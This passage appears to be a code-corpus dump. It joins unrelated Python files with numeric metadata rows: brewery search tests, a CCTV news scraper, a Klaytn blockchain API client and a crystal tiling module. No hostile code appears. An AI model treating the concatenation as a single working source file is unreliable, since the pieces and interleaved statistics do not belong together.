def test_prefetch_authenticated(self):
self.login(self.hidden_user.email)
rv = self.client.get(url_for(self.endpoint))
data = rv.get_json()
assert len(data) == 1
assert data[0]['name'] == self.hidden_brewery.name
def test_search_anon(self):
rv = self.client.get(url_for(self.endpoint, q=self.public_brewery.name))
data = rv.get_json()
assert len(data) == 1
assert data[0]['name'] == self.public_brewery.name
rv = self.client.get(url_for(self.endpoint, q=self.hidden_brewery.name))
data = rv.get_json()
assert len(data) == 0
def test_search_authenticated(self, brewery_factory):
self.login(self.hidden_user.email)
rv = self.client.get(url_for(self.endpoint, q=self.hidden_brewery.name))
data = rv.get_json()
assert len(data) == 1
assert data[0]['name'] == self.hidden_brewery.name
rv = self.client.get(url_for(self.endpoint, q=self.public_brewery.name))
data = rv.get_json()
assert len(data) == 0
| 41.887906 | 88 | 0.648662 | 1,868 | 14,200 | 4.756424 | 0.052463 | 0.06933 | 0.037817 | 0.047046 | 0.906021 | 0.888689 | 0.870793 | 0.84637 | 0.841531 | 0.816432 | 0 | 0.007155 | 0.222465 | 14,200 | 338 | 89 | 42.011834 | 0.797573 | 0 | 0 | 0.769759 | 0 | 0 | 0.105634 | 0.02162 | 0 | 0 | 0 | 0 | 0.158076 | 1 | 0.116838 | false | 0 | 0.013746 | 0.017182 | 0.168385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d174df6bec18fe65b80084bc74c223b7410be6ed | 6,040 | py | Python | akshare/news/news_cctv.py | X-Mars/akshare | 5483fd649b7a7cfc0520b0cbaaf2d76b076855d5 | [
"MIT"
] | 1 | 2021-08-21T14:50:39.000Z | 2021-08-21T14:50:39.000Z | akshare/news/news_cctv.py | X-Mars/akshare | 5483fd649b7a7cfc0520b0cbaaf2d76b076855d5 | [
"MIT"
] | null | null | null | akshare/news/news_cctv.py | X-Mars/akshare | 5483fd649b7a7cfc0520b0cbaaf2d76b076855d5 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Date: 2021/7/20 21:44
Desc: Xinwen Lianbo (CCTV News) transcripts
https://tv.cctv.com/lm/xwlb/?spm=C52056131267.P4y8I53JvSWE.0.0
"""
import pandas as pd
import requests
from bs4 import BeautifulSoup
from tqdm import tqdm
def news_cctv(date: str = "20130308") -> pd.DataFrame:
"""
    Xinwen Lianbo (CCTV News) transcripts
    https://tv.cctv.com/lm/xwlb/?spm=C52056131267.P4y8I53JvSWE.0.0
    :param date: the date to fetch data for; currently from 20160203 onwards
    :type date: str
    :return: Xinwen Lianbo (CCTV News) transcripts
:rtype: pandas.DataFrame
"""
if int(date) <= int("20130708"):
url = f'http://cctv.cntv.cn/lm/xinwenlianbo/{date}.shtml'
r = requests.get(url)
r.encoding = "gbk"
import re
raw_list = re.findall(r"title_array_01\((.*)", r.text)
page_url = [re.findall("(http.*)", item)[0].split("'")[0] for item in raw_list[1:]]
title_list = []
content_list = []
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
'Cache-Control': 'no-cache',
'Cookie': 'cna=DLYSGBDthG4CAbRVCNxSxGT6',
'Host': 'tv.cctv.com',
'Pragma': 'no-cache',
'Proxy-Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36'
}
for page in tqdm(page_url, leave=False):
try:
r = requests.get(page, headers=headers)
r.encoding = 'utf-8'
soup = BeautifulSoup(r.text, "lxml")
title = soup.find('h3').text
content = soup.find('div', attrs={"class": 'cnt_bd'}).text
title_list.append(title.strip("[视频]").strip().replace("\n", " "))
content_list.append(content.strip().strip("央视网消息(新闻联播):").strip("央视网消息(新闻联播):").strip("(新闻联播):").strip().replace("\n", " "))
            except Exception:
continue
temp_df = pd.DataFrame([[date]*len(title_list), title_list, content_list], index=["date", "title", "content"]).T
return temp_df
elif int(date) < int("20160203"):
url = f'http://cctv.cntv.cn/lm/xinwenlianbo/{date}.shtml'
r = requests.get(url)
r.encoding = 'utf-8'
soup = BeautifulSoup(r.text, "lxml")
page_url = [item.find("a")['href'] for item in soup.find("div", attrs={"id": "contentELMT1368521805488378"}).find_all('li')[1:]]
title_list = []
content_list = []
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
'Cache-Control': 'no-cache',
'Cookie': 'cna=DLYSGBDthG4CAbRVCNxSxGT6',
'Host': 'tv.cctv.com',
'Pragma': 'no-cache',
'Proxy-Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36'
}
for page in tqdm(page_url, leave=False):
try:
r = requests.get(page, headers=headers)
r.encoding = 'utf-8'
soup = BeautifulSoup(r.text, "lxml")
title = soup.find('h3').text
content = soup.find('div', attrs={"class": 'cnt_bd'}).text
title_list.append(title.strip("[视频]").strip().replace("\n", " "))
content_list.append(content.strip().strip("央视网消息(新闻联播):").strip("央视网消息(新闻联播):").strip("(新闻联播):").strip().replace("\n", " "))
except Exception:  # skip pages that fail to download or parse
continue
temp_df = pd.DataFrame([[date]*len(title_list), title_list, content_list], index=["date", "title", "content"]).T
return temp_df
else:  # 20160203 and later
url = f'https://tv.cctv.com/lm/xwlb/day/{date}.shtml'
r = requests.get(url)
r.encoding = 'utf-8'
soup = BeautifulSoup(r.text, "lxml")
page_url = [item.find("a")['href'] for item in soup.find_all("li")[1:]]
title_list = []
content_list = []
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
'Cache-Control': 'no-cache',
'Cookie': 'cna=DLYSGBDthG4CAbRVCNxSxGT6',
'Host': 'tv.cctv.com',
'Pragma': 'no-cache',
'Proxy-Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36'
}
for page in tqdm(page_url, leave=False):
try:
r = requests.get(page, headers=headers)
r.encoding = 'utf-8'
soup = BeautifulSoup(r.text, "lxml")
title = soup.find('h3').text
content = soup.find('div', attrs={"class": 'cnt_bd'}).text
title_list.append(title.strip("[视频]").strip().replace("\n", " "))
content_list.append(content.strip().strip("央视网消息(新闻联播):").strip("央视网消息(新闻联播):").strip("(新闻联播):").strip().replace("\n", " "))
except Exception:  # skip pages that fail to download or parse
continue
temp_df = pd.DataFrame([[date]*len(title_list), title_list, content_list], index=["date", "title", "content"]).T
return temp_df
if __name__ == "__main__":
news_cctv_df = news_cctv(date="20150208")
print(news_cctv_df)
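The chained `strip()` calls above treat their argument as a character *set*, not a literal prefix, so they can also remove legitimate leading or trailing characters that happen to appear in the set. A hedged sketch of a stricter cleanup (hypothetical helper, reusing the same prefixes the loop bodies strip):

```python
def clean_content(raw: str) -> str:
    """Remove known boilerplate prefixes literally, then normalize whitespace.

    Unlike str.strip(chars), which drops any characters from the set
    `chars` at both ends, this removes only an exact leading prefix.
    """
    text = raw.strip()
    for prefix in ("央视网消息(新闻联播):", "央视网消息(新闻联播):", "(新闻联播):"):
        if text.startswith(prefix):
            text = text[len(prefix):]
            break
    return text.strip().replace("\n", " ")

cleaned = clean_content("  (新闻联播):今日要闻\n第二段  ")
```

On Python 3.9+ the loop body could use `str.removeprefix` instead of slicing; either way the caller's strings are never over-trimmed.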
| 46.821705 | 160 | 0.555629 | 770 | 6,040 | 4.285714 | 0.219481 | 0.009091 | 0.008182 | 0.036364 | 0.867879 | 0.867879 | 0.861818 | 0.861818 | 0.861818 | 0.861818 | 0 | 0.056932 | 0.258444 | 6,040 | 128 | 161 | 47.1875 | 0.679839 | 0.050993 | 0 | 0.805556 | 0 | 0.055556 | 0.340014 | 0.116034 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009259 | false | 0 | 0.046296 | 0 | 0.083333 | 0.009259 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0f148851fa14cdaba5a8939595e71b48ab7f90f3 | 86 | py | Python | point_transformer_pytorch/__init__.py | lucidrains/point-transformer-pytorch | 16acc40c36640d198b6ae79376103302d0134d35 | [
"MIT"
] | 429 | 2020-12-17T04:21:07.000Z | 2022-03-30T06:41:35.000Z | point_transformer_pytorch/__init__.py | dingdingcai/point-transformer-pytorch | c6c334a2d8c52d82f8a31409c4d599883b064535 | [
"MIT"
] | 13 | 2021-01-11T02:10:43.000Z | 2022-02-28T04:59:32.000Z | point_transformer_pytorch/__init__.py | dingdingcai/point-transformer-pytorch | c6c334a2d8c52d82f8a31409c4d599883b064535 | [
"MIT"
] | 45 | 2020-12-20T08:08:59.000Z | 2022-03-21T11:12:30.000Z | from point_transformer_pytorch.point_transformer_pytorch import PointTransformerLayer
| 43 | 85 | 0.94186 | 9 | 86 | 8.555556 | 0.666667 | 0.415584 | 0.597403 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046512 | 86 | 1 | 86 | 86 | 0.939024 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
0f6e6131edccd04610b6fc8ef914ce77afce5c7b | 14,390 | py | Python | BlockSDK/klaytn.py | Block-Chen/blocksdk-python | dbd75caed90d6b1bb0643cd9aad0c5477ccbd689 | [
"Apache-2.0"
] | 2 | 2021-02-08T18:26:58.000Z | 2021-06-09T09:33:26.000Z | BlockSDK/klaytn.py | Block-Chen/blocksdk-python | dbd75caed90d6b1bb0643cd9aad0c5477ccbd689 | [
"Apache-2.0"
] | null | null | null | BlockSDK/klaytn.py | Block-Chen/blocksdk-python | dbd75caed90d6b1bb0643cd9aad0c5477ccbd689 | [
"Apache-2.0"
] | 1 | 2021-04-23T08:29:33.000Z | 2021-04-23T08:29:33.000Z | from BlockSDK.base import Base
class Klaytn(Base):
"""Klaytn client exposing thin wrappers over the BlockSDK /klay REST endpoints."""
def getBlockChain(self, request = {}):
return self.request("GET","/klay/info")
def getBlock(self, request = {}):
if not('rawtx' in request) or not request['rawtx']:
request['rawtx'] = False
if not('offset' in request) or not request['offset']:
request['offset'] = 0
if not('limit' in request) or not request['limit']:
request['limit'] = 10
return self.request("GET","/klay/blocks/" + str(request['block']),{"rawtx" : request['rawtx'],"offset": request['offset'],"limit" : request['limit']})
def getMemPool(self, request = {}):
if not('rawtx' in request) or not request['rawtx']:
request['rawtx'] = False
if not('offset' in request) or not request['offset']:
request['offset'] = 0
if not('limit' in request) or not request['limit']:
request['limit'] = 10
return self.request("GET","/klay/mempool",{"rawtx" : request['rawtx'],"offset" : request['offset'],"limit" : request['limit']})
def getAddresses(self, request = {}):
if not('offset' in request) or not request['offset']:
request['offset'] = 0
if not('limit' in request) or not request['limit']:
request['limit'] = 10
return self.request("GET","/klay/addresses",{
"offset" : request['offset'],
"limit" : request['limit']
})
def loadAddress(self, request = {}):
return self.request("POST","/klay/addresses/" + request['address'] + "/load",{"private_key" : request['private_key'],"password" : request['password']})
def unloadAddress(self, request = {}):
return self.request("POST","/klay/addresses/" + request['address'] + "/unload")
def createAddress(self, request = {}):
if not('name' in request) or not request['name']:
request['name'] = None
return self.request("POST","/klay/addresses",{"name" : request['name']})
def getAddressInfo(self, request = {}):
if not('reverse' in request) or not request['reverse']:
request['reverse'] = True
if not('rawtx' in request) or not request['rawtx']:
request['rawtx'] = None
if not('offset' in request) or not request['offset']:
request['offset'] = 0
if not('limit' in request) or not request['limit']:
request['limit'] = 10
return self.request("GET","/klay/addresses/" + request['address'],{"reverse" : request['reverse'],"rawtx" : request['rawtx'],"offset" : request['offset'],"limit" : request['limit']})
def getAddressBalance(self, request = {}):
return self.request("GET","/klay/addresses/" + request['address'] + "/balance")
def sendToAddress(self, request = {}):
if not('nonce' in request) or not request['nonce']:
request['nonce'] = None
if not('data' in request) or not request['data']:
request['data'] = None
if not('private_key' in request) or not request['private_key']:
request['private_key'] = None
if not('password' in request) or not request['password']:
request['password'] = None
if not('gas_limit' in request) or not request['gas_limit']:
request['gas_limit'] = None
return self.request("POST","/klay/addresses/" + request['from'] + "/sendtoaddress",{
"to" : request['to'],
"amount" : request['amount'],
"private_key" : request['private_key'],
"password" : request['password'],
"gas_limit" : request['gas_limit']
})
def sendTransaction(self, request = {}):
return self.request("POST","/klay/transactions/send",{
"hex" : request['hex']
})
def getTransaction(self, request = {}):
return self.request("GET","/klay/transactions/" + request['hash'])
def getKIP7(self, request = {}):
return self.request("GET","/klay/kip7-tokens/" + request['contract_address'])
def getKIP7Balance(self, request = {}):
return self.request("GET","/klay/kip7-tokens/" + request['contract_address'] + "/" + request['from'] + "/balance")
def getKIP7Transfer(self, request = {}):
if not('private_key' in request) or not request['private_key']:
request['private_key'] = None
if not('password' in request) or not request['password']:
request['password'] = None
if not('gas_limit' in request) or not request['gas_limit']:
request['gas_limit'] = None
return self.request("POST","/klay/kip7-tokens/" + request['contract_address'] + "/" + request['from'] + "/transfer",{
"to" : request['to'],
"amount" : request['amount'],
"private_key" : request['private_key'],
"password" : request['password'],
"gas_limit" : request['gas_limit']
})
def getKIP7Sign(self, request = {}):
if not('private_key' in request) or not request['private_key']:
request['private_key'] = None
if not('password' in request) or not request['password']:
request['password'] = None
if not('gas_limit' in request) or not request['gas_limit']:
request['gas_limit'] = None
return self.request("POST","/klay/kip7-tokens/" + request['contract_address'] + "/" + request['from'] + "/sign",{
"to" : request['to'],
"amount" : request['amount'],
"private_key" : request['private_key'],
"password" : request['password'],
"gas_limit" : request['gas_limit']
})
def getKIP7Feedelegated(self, request = {}):
if not('private_key' in request) or not request['private_key']:
request['private_key'] = None
if not('password' in request) or not request['password']:
request['password'] = None
if not('gas_limit' in request) or not request['gas_limit']:
request['gas_limit'] = None
return self.request("POST","/klay/kip7-tokens/" + request['contract_address'] + "/" + request['fee_payer'] + "/transfer/feedelegated",{
"from" : request['from'],
"to" : request['to'],
"amount" : request['amount'],
"private_key" : request['private_key'],
"password" : request['password'],
"gwei" : request['gwei'],
"gas_limit" : request['gas_limit'],
"nonce" : request['nonce'],
"v" : request['v'],
"r" : request['r'],
"s" : request['s']
})
def getNfts(self, request = {}):
if not('offset' in request) or not request['offset']:
request['offset'] = 0
if not('limit' in request) or not request['limit']:
request['limit'] = 10
return self.request("GET","/klay/kip17-tokens/" + request['contract_address'] + "/tokens",{
"offset" : request['offset'],
"limit" : request['limit']
})
def getOwnerNfts(self, request = {}):
if not('offset' in request) or not request['offset']:
request['offset'] = 0
if not('limit' in request) or not request['limit']:
request['limit'] = 10
return self.request("GET","/klay/kip17-tokens/" + request['contract_address'] + "/" + request['owner_address'] + "/owner",{
"offset" : request['offset'],
"limit" : request['limit']
})
def getCreatorNfts(self, request = {}):
if not('offset' in request) or not request['offset']:
request['offset'] = 0
if not('limit' in request) or not request['limit']:
request['limit'] = 10
return self.request("GET","/klay/kip17-tokens/" + request['contract_address'] + "/" + request['creator_address'] + "/creator",{
"offset" : request['offset'],
"limit" : request['limit']
})
def getAuctionNfts(self, request = {}):
if not('order_by' in request) or not request['order_by']:
request['order_by'] = 'end_time'
if not('order_direction' in request) or not request['order_direction']:
request['order_direction'] = 'desc'
if not('offset' in request) or not request['offset']:
request['offset'] = 0
if not('limit' in request) or not request['limit']:
request['limit'] = 10
return self.request("GET","/klay/kip17-tokens/" + request['contract_address'] + "/auction",{
"order_by" : request['order_by'],
"order_direction" : request['order_direction'],
"offset" : request['offset'],
"limit" : request['limit']
})
def getSaleNfts(self, request = {}):
if not('order_direction' in request) or not request['order_direction']:
request['order_direction'] = 'desc'
if not('offset' in request) or not request['offset']:
request['offset'] = 0
if not('limit' in request) or not request['limit']:
request['limit'] = 10
return self.request("GET","/klay/kip17-tokens/" + request['contract_address'] + "/" + request['seller_address'] + "/sale",{
"order_direction" : request['order_direction'],
"offset" : request['offset'],
"limit" : request['limit']
})
def getNftBids(self, request = {}):
if not('rawtx' in request) or not request['rawtx']:
request['rawtx'] = 0
if not('order_direction' in request) or not request['order_direction']:
request['order_direction'] = 'desc'
if not('offset' in request) or not request['offset']:
request['offset'] = 0
if not('limit' in request) or not request['limit']:
request['limit'] = 10
return self.request("GET","/klay/kip17-tokens/" + request['contract_address'] + "/" + request['token_id'] + "/bid",{
"order_direction" : request['order_direction'],
"rawtx" : request['rawtx'],
"offset" : request['offset'],
"limit" : request['limit']
})
def getNftInfo(self, request = {}):
return self.request("GET","/klay/kip17-tokens/" + request['contract_address'] + "/" + request['token_id'] + "/info")
def getNftTransfers(self, request = {}):
if not('rawtx' in request) or not request['rawtx']:
request['rawtx'] = 0
if not('offset' in request) or not request['offset']:
request['offset'] = 0
if not('limit' in request) or not request['limit']:
request['limit'] = 10
return self.request("GET","/klay/kip17-tokens/" + request['contract_address'] + "/" + request['token_id'] + "/transfers",{
"rawtx" : request['rawtx'],
"offset" : request['offset'],
"limit" : request['limit']
})
def getContractRead(self, request = {}):
if not('parameter_type' in request) or not request['parameter_type']:
request['parameter_type'] = None
if not('parameter_data' in request) or not request['parameter_data']:
request['parameter_data'] = None
return self.request("POST","/klay/contracts/" + request['contract_address'] + "/read",{
"method" : request['method'],
"return_type" : request['return_type'],
"parameter_type" : request['parameter_type'],
"parameter_data" : request['parameter_data']
})
def getContractWrite(self, request = {}):
if not('private_key' in request) or not request['private_key']:
request['private_key'] = None
if not('password' in request) or not request['password']:
request['password'] = None
if not('gas_limit' in request) or not request['gas_limit']:
request['gas_limit'] = None
if not('parameter_type' in request) or not request['parameter_type']:
request['parameter_type'] = None
if not('parameter_data' in request) or not request['parameter_data']:
request['parameter_data'] = None
return self.request("POST","/klay/contracts/" + request['contract_address'] + "/write",{
"method" : request['method'],
"return_type" : request['return_type'],
"parameter_type" : request['parameter_type'],
"parameter_data" : request['parameter_data'],
"from" : request['from'],
"private_key" : request['private_key'],
"password" : request['password'],
"amount" : request['amount'],
"gas_limit" : request['gas_limit']
})
def getContractWriteSign(self, request = {}):
if not('private_key' in request) or not request['private_key']:
request['private_key'] = None
if not('password' in request) or not request['password']:
request['password'] = None
if not('gas_limit' in request) or not request['gas_limit']:
request['gas_limit'] = None
if not('parameter_type' in request) or not request['parameter_type']:
request['parameter_type'] = None
if not('parameter_data' in request) or not request['parameter_data']:
request['parameter_data'] = None
return self.request("POST","/klay/contracts/" + request['contract_address'] + "/write/sign",{
"method" : request['method'],
"return_type" : request['return_type'],
"parameter_type" : request['parameter_type'],
"parameter_data" : request['parameter_data'],
"from" : request['from'],
"private_key" : request['private_key'],
"password" : request['password'],
"amount" : request['amount'],
"gas_limit" : request['gas_limit']
})
def getContractWriteFeedelegated(self, request = {}):
if not('private_key' in request) or not request['private_key']:
request['private_key'] = None
if not('password' in request) or not request['password']:
request['password'] = None
if not('gas_limit' in request) or not request['gas_limit']:
request['gas_limit'] = None
if not('parameter_type' in request) or not request['parameter_type']:
request['parameter_type'] = None
if not('parameter_data' in request) or not request['parameter_data']:
request['parameter_data'] = None
return self.request("POST","/klay/contracts/" + request['contract_address'] + "/write/feedelegated",{
"method" : request['method'],
"return_type" : request['return_type'],
"parameter_type" : request['parameter_type'],
"parameter_data" : request['parameter_data'],
"from" : request['from'],
"fee_payer" : request['fee_payer'],
"private_key" : request['private_key'],
"password" : request['password'],
"amount" : request['amount'],
"gwei" : request['gwei'],
"gas_limit" : request['gas_limit']
})
def getContractWriteFees(self, request = {}):
if not('gas_limit' in request) or not request['gas_limit']:
request['gas_limit'] = None
if not('parameter_type' in request) or not request['parameter_type']:
request['parameter_type'] = None
if not('parameter_data' in request) or not request['parameter_data']:
request['parameter_data'] = None
return self.request("POST","/klay/contracts/" + request['contract_address'] + "/write/fees",{
"method" : request['method'],
"return_type" : request['return_type'],
"parameter_type" : request['parameter_type'],
"parameter_data" : request['parameter_data'],
"from" : request['from'],
"amount" : request['amount'],
"gas_limit" : request['gas_limit']
})
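Every method above combines a mutable default argument (`request = {}`) with in-place writes such as `request['limit'] = 10`; when a method is called without arguments, those writes land on the single shared default dict, and when a dict is passed in, the caller's dict is mutated. A hedged sketch of a safer pattern (hypothetical `with_defaults` helper, not part of BlockSDK):

```python
def with_defaults(request=None, **defaults):
    """Return a copy of `request` with missing keys filled from `defaults`.

    Avoids the shared-mutable-default pitfall and never mutates the
    caller's dictionary.
    """
    filled = dict(request or {})
    for key, value in defaults.items():
        filled.setdefault(key, value)
    return filled

caller_args = {"limit": 25}
filled = with_defaults(caller_args, rawtx=False, offset=0, limit=10)
```

A method could then build its query params as `with_defaults(request, rawtx=False, offset=0, limit=10)`. One deliberate behavioral difference: `setdefault` keeps an explicitly passed falsy value such as `offset=0`, whereas the original `or not request['offset']` check would overwrite it.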
| 39.209809 | 186 | 0.630577 | 1,713 | 14,390 | 5.189142 | 0.06655 | 0.037687 | 0.082911 | 0.105524 | 0.880077 | 0.861289 | 0.855214 | 0.81719 | 0.79019 | 0.79019 | 0 | 0.005196 | 0.184156 | 14,390 | 366 | 187 | 39.31694 | 0.751959 | 0 | 0 | 0.729373 | 0 | 0 | 0.309937 | 0.003127 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.072607 | 0.0033 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
0f8754c29f9a09b790b131667f0a9ce6eb1d02d4 | 18,315 | py | Python | idaes/apps/matopt/materials/tiling.py | carldlaird/idaes-pse | cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f | [
"RSA-MD"
] | 112 | 2019-02-11T23:16:36.000Z | 2022-03-23T20:59:57.000Z | idaes/apps/matopt/materials/tiling.py | carldlaird/idaes-pse | cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f | [
"RSA-MD"
] | 621 | 2019-03-01T14:44:12.000Z | 2022-03-31T19:49:25.000Z | idaes/apps/matopt/materials/tiling.py | carldlaird/idaes-pse | cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f | [
"RSA-MD"
] | 154 | 2019-02-01T23:46:33.000Z | 2022-03-23T15:07:10.000Z | #################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
from abc import abstractmethod, ABC
import numpy as np
from .geometry import Parallelepiped, Cylinder, CylindricalSector
from .design import Design
class Tiling(object):
""" """
def __init__(self):
pass
# === PROPERTY EVALUATION METHODS
@abstractmethod
def transformInsideTile(self, P):
"""Transform point to lie inside a tile.
Args:
P (numpy.ndarray): Point to modify to be inside tile.
Returns:
None.
"""
raise NotImplementedError
@abstractmethod
def replicateDesign(self, D, nTiles, OldToNewIndices=None, AuxPropMap=None):
"""Create a larger Design by tiling a smaller one.
Args:
D (Design): A smaller Design to tile.
nTiles (int/numpy.ndarray): A specifier for number of
tiles to replicate in periodic directions.
OldToNewIndices (dict<int,list<int>>): Optional, a
dictionary to store the mapping of tiled points
indices from the smaller Design to the larger.
(Default value = None)
AuxPropMap (dict<tuple<string,string>,dict<int,float>>):
Optional, a mapping of locations to properties.
NOTE: It is modified in place, so make a copy before.
(Default value = None)
Returns:
(Design): A larger, periodic Design
"""
raise NotImplementedError
class LinearTiling(Tiling, ABC):
""" Class to manage linear periodicity. """
DBL_TOL = 1e-5
# === STANDARD CONSTRUCTOR
def __init__(self, TilingDirections_, argShape=None):
super().__init__()
self._TileShape = argShape
self._TilingDirections = TilingDirections_
# === CONSTRUCTOR - From Parallelepiped
@classmethod
def fromParallelepiped(cls, argShape):
assert (type(argShape) == Parallelepiped), 'The input shape is not an instance of Parallelepiped.'
TilingDirections_ = [argShape.Vz, -argShape.Vz]
return cls(TilingDirections_, argShape)
# === CONSTRUCTOR - From Cylinder or CylindricalSector
@classmethod
def fromCylindricalShape(cls, argShape):
assert (type(argShape) == Cylinder or CylindricalSector), 'The input shape is not an instance of Cylinder or CylindricalSector.'
TilingDirections_ = [argShape.Vh, -argShape.Vh]
return cls(TilingDirections_, argShape)
# === CONSTRUCTOR - From POSCAR files
@classmethod
def fromPOSCAR(cls, filename):
return cls.fromParallelepiped(Parallelepiped.fromPOSCAR(filename))
# === BASIC QUERY METHODS
@property
def TileShape(self):
return self._TileShape
@property
def TilingDirections(self):
return self._TilingDirections
@property
def V(self):
return self._TilingDirections[0]
class PlanarTiling(Tiling):
""" """
DBL_TOL = 1e-5
# === STANDARD CONSTRUCTOR
def __init__(self, Parallelepiped_):
super().__init__()
self._TileShape = Parallelepiped_
self._TilingDirections = []
self._TilingDirections.append(-Parallelepiped_.Vx)
self._TilingDirections.append(-Parallelepiped_.Vy)
self._TilingDirections.append(Parallelepiped_.Vx)
self._TilingDirections.append(Parallelepiped_.Vy)
self._TilingDirections.append(-Parallelepiped_.Vx - Parallelepiped_.Vy)
self._TilingDirections.append(-Parallelepiped_.Vx + Parallelepiped_.Vy)
self._TilingDirections.append(Parallelepiped_.Vx - Parallelepiped_.Vy)
self._TilingDirections.append(Parallelepiped_.Vx + Parallelepiped_.Vy)
# === CONSTRUCTOR - From POSCAR file
@classmethod
def fromPOSCAR(cls, filename):
"""
Args:
filename:
Returns:
"""
return cls(Parallelepiped.fromPOSCAR(filename))
# === PROPERTY EVALUATION METHODS
def transformInsideTile(self, P, EdgeTol=DBL_TOL):
"""
Args:
P: param EdgeTol: (Default value = DBL_TOL)
EdgeTol: (Default value = DBL_TOL)
Returns:
"""
def _isInsideAndNotOnPosEdge(P, EdgeTol=EdgeTol):
return (self.TileShape.isInShape(P) and
self.TileShape.satisfiesFacet(P, 2, -EdgeTol) and
self.TileShape.satisfiesFacet(P, 3, -EdgeTol))
if _isInsideAndNotOnPosEdge(P, EdgeTol):
return True # Do not transform P, return True
NegCorner = self.TileShape.V[0]
PosCorner = self.TileShape.V[7]
Nx = self.TileShape.FacetNorms[3]
Ny = self.TileShape.FacetNorms[2]
while np.inner(P - NegCorner, -Nx) > PlanarTiling.DBL_TOL:
P += self.TileShape.Vx
while np.inner(P - PosCorner, Nx) > -PlanarTiling.DBL_TOL:
P -= self.TileShape.Vx
while np.inner(P - NegCorner, -Ny) > PlanarTiling.DBL_TOL:
P += self.TileShape.Vy
while np.inner(P - PosCorner, Ny) > -PlanarTiling.DBL_TOL:
P -= self.TileShape.Vy
assert (_isInsideAndNotOnPosEdge(P))
return True
def getFractionalCoords(self, P, blnRelativeToCenter=False, blnRoundInside=True, blnPreferZero=True):
"""
Args:
P: param blnRelativeToCenter: (Default value = False)
blnRoundInside: Default value = True)
blnPreferZero: Default value = True)
blnRelativeToCenter: (Default value = False)
Returns:
"""
# NOTE: The option blnRoundInside is just a way to round numbers close
# to the bounds (0,1) so that they never result in values outside
# of that range. Some programs (like AtomEye?) are not robust
# enough to handle small negative numbers or values greater than 1
# in these cases.
Pfrac = self.TileShape.getFractionalCoords(P, blnRelativeToCenter=blnRelativeToCenter)
Pfrac -= Pfrac.astype(int)
if blnRoundInside:
if blnPreferZero:
Pfrac[np.isclose(Pfrac, 0.0, rtol=0.0, atol=PlanarTiling.DBL_TOL)] = 0.0
Pfrac[np.isclose(Pfrac, 1.0, rtol=0.0, atol=PlanarTiling.DBL_TOL)] = 0.0
else:
Pfrac[np.isclose(Pfrac, 0.0, rtol=0.0, atol=PlanarTiling.DBL_TOL)] = 0.0
Pfrac[np.isclose(Pfrac, 1.0, rtol=0.0, atol=PlanarTiling.DBL_TOL)] = 1.0
return Pfrac
def getDistance(self, P0, P1):
"""
Args:
P0: param P1:
P1:
Returns:
"""
result = np.linalg.norm(P1 - P0)
for TilingDirection in self.TilingDirections:
P1Tiled = P1 + TilingDirection
